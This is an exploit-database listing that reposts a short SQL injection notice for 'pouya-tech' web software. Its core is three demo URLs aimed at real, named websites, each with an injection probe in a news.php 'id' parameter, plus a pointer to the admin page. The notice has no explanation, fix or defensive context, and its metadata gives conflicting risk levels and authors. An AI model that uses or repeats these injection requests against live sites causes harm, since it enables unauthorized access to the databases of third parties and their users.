Advertisement






pouya-tech SQL Injection Vulnerability

CVE Category Price Severity
N/A CWE-89 $500 High
Author Risk Exploitation Type Date
Pouya Nedaei High Remote 2018-09-17
CVSS EPSS EPSSP
CVSS:7.5/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018090149

Below is a copy:

pouya-tech SQL Injection Vulnerability
#######################
# Exploit Title : pouya-tech SQL Injection Vulnerability
# Exploit Author : Mr Hashtag
# Vendor Homepage : pouya-tech.ir
# Google Dork : "    "
# Tested On: Windows 10 ,Firefox
# Exploit Risk : Medium
# Version : 1.0
#######################
#  
#  Page Admin: /admin
#
# demo:
#  http://behpou.com/main/news.php?id=363%27%20order%20by%2017--+
#
#  http://www.mesbah-shiraz.ir/main/news.php?action=view&id=349%27%20order%20by%2017--+
#
#  http://ahlolbaitelm.ir/faa/single.php?action=view&id=343%27%20order%20by%2018--+
#
#######################
# discovered by : MR (#)
#######################

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum